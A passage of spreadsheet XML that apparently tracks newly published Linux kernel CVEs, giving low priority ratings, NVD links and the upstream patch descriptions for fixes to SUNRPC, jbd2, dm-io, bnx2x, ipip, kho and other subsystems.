          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1013" s="5" t="inlineStr"/>
      <c r="Q1013" s="5" t="inlineStr"/>
      <c r="R1013" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
SUNRPC: reject duplicate CREDS_VALUE options
gssx_dec_option_array() walks the wire-supplied option array and, for
every entry whose name matches CREDS_VALUE, calls
gssx_dec_linux_creds() on the same struct svc_cred. That helper
unconditionally installs a fresh groups_alloc() result into
creds-&gt;cr_group_info without releasing whatever pointer was already
there:
    for (i = 0; i &lt; count; i++) {
        ... decode name ...
        if (length == sizeof(CREDS_VALUE) &amp;&amp;
            memcmp(p, CREDS_VALUE, sizeof(CREDS_VALUE)) == 0) {
            err = gssx_dec_linux_creds(xdr, creds);
            ...
        }
    }
A reply that carries two CREDS_VALUE entries therefore overwrites
cr_group_info on the second iteration and orphans the group_info
allocated by the first call. The earlier free_creds path only
releases the last cr_group_info via free_svc_cred(), so the first
allocation's refcount stays at one and its kvmalloc-backed storage
is leaked. No in-tree caller of gssp_accept_sec_context_upcall()
expects more than one CREDS_VALUE per reply.
Fix by tracking whether a CREDS_VALUE option has already been
decoded and returning -EINVAL on any subsequent match, so the
free_creds path releases the single group_info that was installed.</t>
        </is>
      </c>
      <c r="S1013" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89539</t>
        </is>
      </c>
    </row>
    <row r="1014">
      <c r="A1014" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1014" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1014" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89543</t>
        </is>
      </c>
      <c r="D1014" s="5" t="inlineStr"/>
      <c r="E1014" s="5" t="inlineStr"/>
      <c r="F1014" s="5" t="inlineStr"/>
      <c r="G1014" s="5" t="inlineStr"/>
      <c r="H1014" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1014" s="5" t="inlineStr"/>
      <c r="J1014" s="5" t="inlineStr"/>
      <c r="K1014" s="5" t="inlineStr"/>
      <c r="L1014" s="5" t="inlineStr"/>
      <c r="M1014" s="5" t="inlineStr"/>
      <c r="N1014" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1014" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1014" s="5" t="inlineStr"/>
      <c r="Q1014" s="5" t="inlineStr"/>
      <c r="R1014" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sunrpc: fix use-after-free in __rpc_clnt_handle_event and __rpc_clnt_remove_pipedir
Normal client creation goes through rpc_setup_pipedir(), which records
clnt-&gt;pipefs_sb, but the mount-event path in __rpc_clnt_handle_event()
calls rpc_setup_pipedir_sb() directly and never refreshes that field.
The umount path also removes the directory without clearing
clnt-&gt;pipefs_sb.
After a late pipefs mount or any remount, rpc_clnt_remove_pipedir()
compares the current superblock against a stale pipefs_sb pointer and
skips cleanup, leaving pipefs dentries whose inode private data still
points at a freed rpc_clnt, leading to a potential use-after-free during
subsequent rpc_info_open() or rpc_show_info() calls.
Fix this by properly updating clnt-&gt;pipefs_sb upon mount events and
clearing it during unmount or failure paths.</t>
        </is>
      </c>
      <c r="S1014" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89543</t>
        </is>
      </c>
    </row>
    <row r="1015">
      <c r="A1015" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1015" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1015" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89552</t>
        </is>
      </c>
      <c r="D1015" s="5" t="inlineStr"/>
      <c r="E1015" s="5" t="inlineStr"/>
      <c r="F1015" s="5" t="inlineStr"/>
      <c r="G1015" s="5" t="inlineStr"/>
      <c r="H1015" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1015" s="5" t="inlineStr"/>
      <c r="J1015" s="5" t="inlineStr"/>
      <c r="K1015" s="5" t="inlineStr"/>
      <c r="L1015" s="5" t="inlineStr"/>
      <c r="M1015" s="5" t="inlineStr"/>
      <c r="N1015" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1015" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1015" s="5" t="inlineStr"/>
      <c r="Q1015" s="5" t="inlineStr"/>
      <c r="R1015" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
params: fix charp corruption on allocation failure
param_set_charp() stores charp parameters in allocated memory after slab is
available, and releases the previous value when the parameter is updated.
The previous value is released before the replacement allocation succeeds.
If kmalloc_parameter() fails, the setter returns -ENOMEM with the parameter
left as NULL.
Failing zswap's compressor update before zswap is initialized can later
trigger:
  BUG: kernel NULL pointer dereference, address: 0000000000000000
  RIP: 0010:strcmp+0x10/0x30
  Call Trace:
    zswap_setup+0x3b1/0x490
    zswap_enabled_param_set+0x5b/0xa0
    param_attr_store+0x93/0xe0
    module_attr_store+0x1c/0x30
    kernfs_fop_write_iter+0x116/0x1f0
Allocate and copy the replacement first, then replace the parameter value
only after allocation succeeds.</t>
        </is>
      </c>
      <c r="S1015" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89552</t>
        </is>
      </c>
    </row>
    <row r="1016">
      <c r="A1016" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1016" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1016" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89556</t>
        </is>
      </c>
      <c r="D1016" s="5" t="inlineStr"/>
      <c r="E1016" s="5" t="inlineStr"/>
      <c r="F1016" s="5" t="inlineStr"/>
      <c r="G1016" s="5" t="inlineStr"/>
      <c r="H1016" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1016" s="5" t="inlineStr"/>
      <c r="J1016" s="5" t="inlineStr"/>
      <c r="K1016" s="5" t="inlineStr"/>
      <c r="L1016" s="5" t="inlineStr"/>
      <c r="M1016" s="5" t="inlineStr"/>
      <c r="N1016" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1016" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1016" s="5" t="inlineStr"/>
      <c r="Q1016" s="5" t="inlineStr"/>
      <c r="R1016" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
module: validate string table section types
In elf_validity_cache_sechdrs, section sizes and offsets are validated,
unless the section type is SHT_NULL or SHT_NOBITS.
Later, elf_validity_cache_secstrings and elf_validity_cache_index_str
access the section name table (.shstrtab) and symbol string table
(.strtab) headers without first ensuring that their types are
SHT_STRTAB. If a section type is SHT_NULL or SHT_NOBITS, sh_offset has
not been validated and may reference out-of-bounds memory when
dereferenced in elf_validity_cache_secstrings or
elf_validity_cache_strtab.
Validate that both string section headers are of type SHT_STRTAB before
caching them.</t>
        </is>
      </c>
      <c r="S1016" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89556</t>
        </is>
      </c>
    </row>
    <row r="1017">
      <c r="A1017" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1017" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1017" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89565</t>
        </is>
      </c>
      <c r="D1017" s="5" t="inlineStr"/>
      <c r="E1017" s="5" t="inlineStr"/>
      <c r="F1017" s="5" t="inlineStr"/>
      <c r="G1017" s="5" t="inlineStr"/>
      <c r="H1017" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1017" s="5" t="inlineStr"/>
      <c r="J1017" s="5" t="inlineStr"/>
      <c r="K1017" s="5" t="inlineStr"/>
      <c r="L1017" s="5" t="inlineStr"/>
      <c r="M1017" s="5" t="inlineStr"/>
      <c r="N1017" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1017" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1017" s="5" t="inlineStr"/>
      <c r="Q1017" s="5" t="inlineStr"/>
      <c r="R1017" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipip: fix skb leak in collect_md mode when metadata_dst allocation fails
In collect_md mode ipip_tunnel_rcv() returns 0 without freeing the skb
when ip_tun_rx_dst() fails to allocate the metadata_dst. ipip_rcv() and
mplsip_rcv() are registered as xfrm_tunnel handlers, so tunnel4_rcv()
and tunnelmpls4_rcv() read the zero return as "the packet has been
consumed" and do not free it either. The skb is leaked.
The other tunnel drivers all dispose of the packet at this point:
ip6_tunnel.c jumps to its drop label, ip_gre.c and ip6_gre.c return
PACKET_REJECT, which makes gre_rcv() free the skb. Only ipip returns 0.
Jump to the existing drop label instead. It frees the skb and still
returns 0, so the packet keeps being reported as consumed, which is what
we want here: the outer header has already been pulled, and neither the
remaining handlers nor an ICMP unreachable have any use for it.
Triggering this needs an ipip or mplsip tunnel in collect_md mode and an
atomic allocation failure, which is why it has gone unnoticed.</t>
        </is>
      </c>
      <c r="S1017" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89565</t>
        </is>
      </c>
    </row>
    <row r="1018">
      <c r="A1018" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1018" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1018" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89566</t>
        </is>
      </c>
      <c r="D1018" s="5" t="inlineStr"/>
      <c r="E1018" s="5" t="inlineStr"/>
      <c r="F1018" s="5" t="inlineStr"/>
      <c r="G1018" s="5" t="inlineStr"/>
      <c r="H1018" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1018" s="5" t="inlineStr"/>
      <c r="J1018" s="5" t="inlineStr"/>
      <c r="K1018" s="5" t="inlineStr"/>
      <c r="L1018" s="5" t="inlineStr"/>
      <c r="M1018" s="5" t="inlineStr"/>
      <c r="N1018" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1018" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1018" s="5" t="inlineStr"/>
      <c r="Q1018" s="5" t="inlineStr"/>
      <c r="R1018" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
jbd2: check need_resched() when skipping busy checkpoint buffers
journal_shrink_one_cp_list() skips busy checkpoint buffers when called
with JBD2_SHRINK_BUSY_SKIP.  The continue statement on this path also
skips the need_resched() check at the end of the loop body.
Consequently, when a checkpoint list contains mostly busy buffers, the
shrinker can walk the entire list while holding journal-&gt;j_list_lock,
even when a reschedule has been requested.  Large checkpoint lists under
memory pressure can therefore cause long lock hold times and leave other
CPUs spinning on j_list_lock, resulting in soft lockups or RCU stalls.
Route the busy-buffer path through the need_resched() check so that the
shrinker can release j_list_lock and reschedule promptly, restoring
parity with the clean-buffer path, which already checks need_resched().
This does not change which checkpoint buffers are eligible for removal.</t>
        </is>
      </c>
      <c r="S1018" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89566</t>
        </is>
      </c>
    </row>
    <row r="1019">
      <c r="A1019" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1019" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1019" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89567</t>
        </is>
      </c>
      <c r="D1019" s="5" t="inlineStr"/>
      <c r="E1019" s="5" t="inlineStr"/>
      <c r="F1019" s="5" t="inlineStr"/>
      <c r="G1019" s="5" t="inlineStr"/>
      <c r="H1019" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1019" s="5" t="inlineStr"/>
      <c r="J1019" s="5" t="inlineStr"/>
      <c r="K1019" s="5" t="inlineStr"/>
      <c r="L1019" s="5" t="inlineStr"/>
      <c r="M1019" s="5" t="inlineStr"/>
      <c r="N1019" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1019" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1019" s="5" t="inlineStr"/>
      <c r="Q1019" s="5" t="inlineStr"/>
      <c r="R1019" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
jbd2: bound shrinker scans by examined checkpoint buffers
The jbd2 shrinker currently accounts only checkpoint buffers that it
successfully releases against nr_to_scan.  Busy buffers therefore do not
consume the scan budget.
If a checkpoint transaction contains mostly busy buffers, the shrinker
can scan its entire checkpoint list while holding journal-&gt;j_list_lock.
Large checkpoint lists can result in excessive lock hold times and leave
other CPUs spinning on j_list_lock, causing soft lockups or RCU stalls.
Pass nr_to_scan into journal_shrink_one_cp_list() and decrement it for
every buffer examined, including busy buffers.  Pass NULL from checkpoint
cleanup paths so their existing full-list behavior is preserved.
This restores the scan-budget semantics that existed before
journal_shrink_one_cp_list() was changed to always scan a complete
checkpoint list.</t>
        </is>
      </c>
      <c r="S1019" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89567</t>
        </is>
      </c>
    </row>
    <row r="1020">
      <c r="A1020" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1020" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1020" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89568</t>
        </is>
      </c>
      <c r="D1020" s="5" t="inlineStr"/>
      <c r="E1020" s="5" t="inlineStr"/>
      <c r="F1020" s="5" t="inlineStr"/>
      <c r="G1020" s="5" t="inlineStr"/>
      <c r="H1020" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1020" s="5" t="inlineStr"/>
      <c r="J1020" s="5" t="inlineStr"/>
      <c r="K1020" s="5" t="inlineStr"/>
      <c r="L1020" s="5" t="inlineStr"/>
      <c r="M1020" s="5" t="inlineStr"/>
      <c r="N1020" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1020" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1020" s="5" t="inlineStr"/>
      <c r="Q1020" s="5" t="inlineStr"/>
      <c r="R1020" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
kho: fix size calculation in kho_preserved_memory_reserve()
kho_preserved_memory_reserve() calculates the size of a preservation by
doing 1 &lt;&lt; (order + PAGE_SHIFT). Since the '1' is a 32-bit integer, it
can only be shifted by 31. That is, it will only work for preservations
up to 2 GiB. Larger preservations will trigger undefined behaviour.
While preservations larger than 2 GiB can't be obtained via folios
currently, they can be obtained via kho_preserve_pages().
For example, memblock reserve_mem uses kho_preserve_pages().
Reservations larger than 2 GiB are valid and will trigger this bug if
properly aligned.
Fix it by using 1UL for shifting.</t>
        </is>
      </c>
      <c r="S1020" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89568</t>
        </is>
      </c>
    </row>
    <row r="1021">
      <c r="A1021" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1021" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1021" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89572</t>
        </is>
      </c>
      <c r="D1021" s="5" t="inlineStr"/>
      <c r="E1021" s="5" t="inlineStr"/>
      <c r="F1021" s="5" t="inlineStr"/>
      <c r="G1021" s="5" t="inlineStr"/>
      <c r="H1021" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1021" s="5" t="inlineStr"/>
      <c r="J1021" s="5" t="inlineStr"/>
      <c r="K1021" s="5" t="inlineStr"/>
      <c r="L1021" s="5" t="inlineStr"/>
      <c r="M1021" s="5" t="inlineStr"/>
      <c r="N1021" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1021" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1021" s="5" t="inlineStr"/>
      <c r="Q1021" s="5" t="inlineStr"/>
      <c r="R1021" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cpufreq: apple-soc: Fix OPP table cleanup
apple_soc_cpufreq_init() adds OPP tables from firmware, but
some failure paths do not remove them. The driver also uses
dev_pm_opp_remove_all_dynamic(), which is not the right cleanup
helper for OPP tables loaded from firmware.
Use the cpumask OPP helper after the policy CPU mask has been
populated. Pair it with the matching cpumask remove helper on
failure paths and in apple_soc_cpufreq_exit(). This also removes
the separate dev_pm_opp_set_sharing_cpus() call, as the cpumask
helper loads the DT OPP tables for all CPUs in the policy.</t>
        </is>
      </c>
      <c r="S1021" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89572</t>
        </is>
      </c>
    </row>
    <row r="1022">
      <c r="A1022" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1022" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1022" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89575</t>
        </is>
      </c>
      <c r="D1022" s="5" t="inlineStr"/>
      <c r="E1022" s="5" t="inlineStr"/>
      <c r="F1022" s="5" t="inlineStr"/>
      <c r="G1022" s="5" t="inlineStr"/>
      <c r="H1022" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1022" s="5" t="inlineStr"/>
      <c r="J1022" s="5" t="inlineStr"/>
      <c r="K1022" s="5" t="inlineStr"/>
      <c r="L1022" s="5" t="inlineStr"/>
      <c r="M1022" s="5" t="inlineStr"/>
      <c r="N1022" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1022" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1022" s="5" t="inlineStr"/>
      <c r="Q1022" s="5" t="inlineStr"/>
      <c r="R1022" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dm raid1: reserve space for NUL-terminator in build_constructor_string()
Reserve space for the termination NUL after the maximum 20 decimal
digits of a long long value to avoid buffer overflow in sprintf().</t>
        </is>
      </c>
      <c r="S1022" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89575</t>
        </is>
      </c>
    </row>
    <row r="1023">
      <c r="A1023" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1023" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1023" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89576</t>
        </is>
      </c>
      <c r="D1023" s="5" t="inlineStr"/>
      <c r="E1023" s="5" t="inlineStr"/>
      <c r="F1023" s="5" t="inlineStr"/>
      <c r="G1023" s="5" t="inlineStr"/>
      <c r="H1023" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1023" s="5" t="inlineStr"/>
      <c r="J1023" s="5" t="inlineStr"/>
      <c r="K1023" s="5" t="inlineStr"/>
      <c r="L1023" s="5" t="inlineStr"/>
      <c r="M1023" s="5" t="inlineStr"/>
      <c r="N1023" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1023" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1023" s="5" t="inlineStr"/>
      <c r="Q1023" s="5" t="inlineStr"/>
      <c r="R1023" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dm-era: fix shadowed superblock leak on take-snap failure
metadata_take_snap() bumps the live superblock refcount and then
dm_tm_shadow_block() allocates a new block for the metadata snapshot.
If the subsequent dm_sm_inc_block() of writeset_tree_root or
era_array_root fails, the function only unlocks the clone and
returns.  The newly allocated shadow block is never returned to the
metadata space map, so each failed take-snap permanently leaks one
metadata block.
Free the clone with dm_sm_dec_block() on those error paths, matching
the final step of metadata_drop_snap().</t>
        </is>
      </c>
      <c r="S1023" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89576</t>
        </is>
      </c>
    </row>
    <row r="1024">
      <c r="A1024" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1024" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1024" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89577</t>
        </is>
      </c>
      <c r="D1024" s="5" t="inlineStr"/>
      <c r="E1024" s="5" t="inlineStr"/>
      <c r="F1024" s="5" t="inlineStr"/>
      <c r="G1024" s="5" t="inlineStr"/>
      <c r="H1024" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1024" s="5" t="inlineStr"/>
      <c r="J1024" s="5" t="inlineStr"/>
      <c r="K1024" s="5" t="inlineStr"/>
      <c r="L1024" s="5" t="inlineStr"/>
      <c r="M1024" s="5" t="inlineStr"/>
      <c r="N1024" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1024" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1024" s="5" t="inlineStr"/>
      <c r="Q1024" s="5" t="inlineStr"/>
      <c r="R1024" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dm-io: report non-retryable errors separatedly
The error codes BLK_STS_NOTSUPP and BLK_STS_INVAL should not cause leg
failure on dm-raid1. This patch changes the interface to dm-io, so that
it reports two error bitmaps - error_bits and unsup_bits. The unsup_bit
bitmap tracks BLK_STS_NOTSUPP or BLK_STS_INVAL errors, the error_bits
bitmap tracks all the other errors.
dm-raid1 is changed so that it won't fail a leg if it receives an error
in the unsup_bits bitmap.
This patch (with 62dc37a819a5) fixes misbehavior if the user uses
unaligned bio vectors on dm-raid1.</t>
        </is>
      </c>
      <c r="S1024" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89577</t>
        </is>
      </c>
    </row>
    <row r="1025">
      <c r="A1025" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1025" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1025" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89578</t>
        </is>
      </c>
      <c r="D1025" s="5" t="inlineStr"/>
      <c r="E1025" s="5" t="inlineStr"/>
      <c r="F1025" s="5" t="inlineStr"/>
      <c r="G1025" s="5" t="inlineStr"/>
      <c r="H1025" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1025" s="5" t="inlineStr"/>
      <c r="J1025" s="5" t="inlineStr"/>
      <c r="K1025" s="5" t="inlineStr"/>
      <c r="L1025" s="5" t="inlineStr"/>
      <c r="M1025" s="5" t="inlineStr"/>
      <c r="N1025" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1025" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1025" s="5" t="inlineStr"/>
      <c r="Q1025" s="5" t="inlineStr"/>
      <c r="R1025" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dm-io: clone the source bio instead of copying its biovec
For DM_IO_BIO requests, do_region() built each destination bio by walking
the source bio's biovec and re-adding the pages one at a time, tracking
the remaining transfer in sectors. The vector lengths are byte granular
and need not be sector aligned (e.g. a misaligned O_DIRECT buffer split
across pages), so the sector-based accounting could lose a sub-sector
fragment: to_sector() truncated the remainder and the outer loop spun
forever submitting empty bios, hanging the I/O.
There is no need to rebuild the biovec at all. The destination reads into
(or writes from) exactly the same pages as the source bio, so the bio can
simply clone the source's biovec with bio_alloc_clone() and remap it to
the target device. The clone inherits the source's iterator and alignment,
and the block layer splits it to the target's limits on submission, so the
whole region maps to a single cloned bio with no manual page copying or
sector accounting.
This removes the per-page copy path (and its open-coded bvec dpages
helpers) for bio-backed I/O and fixes the hang on misaligned direct I/O to
a dm-mirror device. Page-list, vma and kmem sources keep the existing copy
path.</t>
        </is>
      </c>
      <c r="S1025" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89578</t>
        </is>
      </c>
    </row>
    <row r="1026">
      <c r="A1026" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1026" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1026" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89582</t>
        </is>
      </c>
      <c r="D1026" s="5" t="inlineStr"/>
      <c r="E1026" s="5" t="inlineStr"/>
      <c r="F1026" s="5" t="inlineStr"/>
      <c r="G1026" s="5" t="inlineStr"/>
      <c r="H1026" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1026" s="5" t="inlineStr"/>
      <c r="J1026" s="5" t="inlineStr"/>
      <c r="K1026" s="5" t="inlineStr"/>
      <c r="L1026" s="5" t="inlineStr"/>
      <c r="M1026" s="5" t="inlineStr"/>
      <c r="N1026" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1026" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1026" s="5" t="inlineStr"/>
      <c r="Q1026" s="5" t="inlineStr"/>
      <c r="R1026" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bnx2x: fix double free in bnx2x_init_firmware() error path
bnx2x_init_firmware() frees bp-&gt;init_ops, bp-&gt;init_data and
bp-&gt;init_ops_offsets in its error path without setting them to NULL.
The cleanup function bnx2x_release_firmware() frees the same three
pointers unconditionally, so if init_firmware fails and
release_firmware is later called (e.g. from __bnx2x_remove or through
the function state machine), all three are freed a second time.
Set each pointer to NULL after kfree() in the error path so that the
subsequent kfree(NULL) in bnx2x_release_firmware() is a safe no-op.</t>
        </is>
      </c>
      <c r="S1026" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89582</t>
        </is>
      </c>
    </row>
    <row r="1027">
      <c r="A1027" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1027" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1027" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89589</t>
        </is>
      </c>
      <c r="D1027" s="5" t="inlineStr"/>
      <c r="E1027" s="5" t="inlineStr"/>
      <c r="F1027" s="5" t="inlineStr"/>
      <c r="G1027" s="5" t="inlineStr"/>
      <c r="H1027" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1027" s="5" t="inlineStr"/>
      <c r="J1027" s="5" t="inlineStr"/>
      <c r="K1027" s="5" t="inlineStr"/>
      <c r="L1027" s="5" t="inlineStr"/>
      <c r="M1027" s="5" t="inlineStr"/>
      <c r="N1027" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1027" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1027" s="5" t="inlineStr"/>
      <c r="Q1027" s="5" t="inlineStr"/>
      <c r="R1027" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
acpi/apei/ghes: Use raw_spinlock_t for CXL CPER work locks
The CXL CPER work registration and unregistration helpers acquire
cxl_cper_work_lock and cxl_cper_prot_err_work_lock with a spinlock
guard(), which leaves local interrupts enabled. The corresponding post
paths (cxl_cper_post_event(), cxl_cper_post_prot_err()) execute in hard
IRQ context (they are called from the GHES error notification path) and
acquire the same locks with an irqsave guard().
If a CPU is holding one of these locks via a spinlock guard() when a GHES
interrupt arrives on the same CPU, the IRQ handler spins on the held lock
waiting for it to release, while the lock holder is preempted by the IRQ.
The result is a deadlock.
Convert both locks from spinlock_t to raw_spinlock_t and use guard() at
all call sites. On PREEMPT_RT kernels spinlock_t is backed by rt_mutex and
sleeping from hard IRQ context is not permitted; raw_spinlock_t is safe in
both contexts.
Add WARN_ONCE to both register functions to surface double-registration
bugs at runtime.
Restructure both unregister functions to clear the global work pointer
under the lock before calling cancel_work_sync(), closing the window
where a CPER interrupt could schedule work on a pointer about to be
freed. Add kfifo_reset() after cancel_work_sync() so stale entries
are not replayed on next module load.
Both kfifos are single-consumer: only one work_struct is registered at
a time, enforced by the WARN_ONCE guard in the register functions.
kfifo_reset() is safe outside the lock because cancel_work_sync() has
already quiesced the consumer, and no new consumer can register until
the current module exit completes and a fresh module init runs.
Remove the redundant cancel_work_sync() call from cxl_ras_exit() and
cxl_pci_driver_exit(). The CPER unregister functions now quiesce
the work internally.</t>
